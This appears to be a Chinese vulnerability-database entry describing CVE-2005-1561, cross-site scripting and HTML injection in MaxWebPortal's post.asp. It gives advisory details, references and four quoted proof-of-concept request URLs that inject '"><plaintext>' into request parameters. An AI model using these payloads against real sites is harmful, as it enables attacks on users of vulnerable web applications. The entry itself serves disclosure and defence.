MaxWebPortal多个远程漏洞-安全小百科

MaxWebPortal多个远程漏洞

漏洞ID	1108774	漏洞类型	跨站脚本
发布时间	2005-05-11	更新时间	2005-10-20
CVE编号	CVE-2005-1561	CNNVD-ID	CNNVD-200505-941
漏洞平台	ASP	CVSS评分	4.3

|漏洞来源

https://www.exploit-db.com/exploits/25651
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-941

|漏洞详情

MaxWebPortal1.3.5及更早版本中的post.asp存在多个跨站脚本攻击(XSS)漏洞，远程攻击者可以通过(1)mod，(2)M或(3)type参数来注入任意Web脚本或HTML。

|漏洞EXP

source: http://www.securityfocus.com/bid/13601/info

MaxWebPortal is affected by multiple remote vulnerabilities. These issues may allow an attacker to carry out cross-site scripting, SQL injection and HTML injection attacks.

MaxWebPortal 1.3.5 and prior versions are reportedly vulnerable to these issues. 

Cross-site Scripting
/post.asp?method=Topic&FORUM_ID=1& CAT_ID=1&Forum_Title=%00General+Chat&mod="><plaintext>

/post.asp?method=Topic&FORUM_ID=1& CAT_ID=1&Forum_Title=%00General+Chat&M="><plaintext>

/post.asp?method=Topic&FORUM_ID=1& CAT_ID=1&Forum_Title=%00General+Chat&type="><plaintext>

HTML Injection:
/post.asp?method=Topic&FORUM_ID=1& CAT_ID=1&Forum_Title=http://<plaintext>

|参考资料

来源:XF
名称:maxwebportal-postasp-xss(20560)
链接:http://xforce.iss.net/xforce/xfdb/20560
来源:SECUNIA
名称:15329
链接:http://secunia.com/advisories/15329
来源:BUGTRAQ
名称:20050511[HSCSecurityGroup]MaxWebPortal-MultipleSQLinjection/XSS
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=111584883727605&w;=2
来源:BID
名称:13601
链接:http://www.securityfocus.com/bid/13601
来源:MISC
链接:http://www.hackerscenter.com/archive/view.asp?id=2542
来源:OSVDB
名称:16501
链接:http://www.osvdb.org/16501

相关推荐: SpamAssassin BSMTP Mode Buffer Overflow Vulnerability

SpamAssassin BSMTP Mode Buffer Overflow Vulnerability 漏洞ID 1100959 漏洞类型 Boundary Condition Error 发布时间 2003-01-24 更新时间 2003-01-24 C…

文章版权归作者所有，未经允许请勿转载。

THE END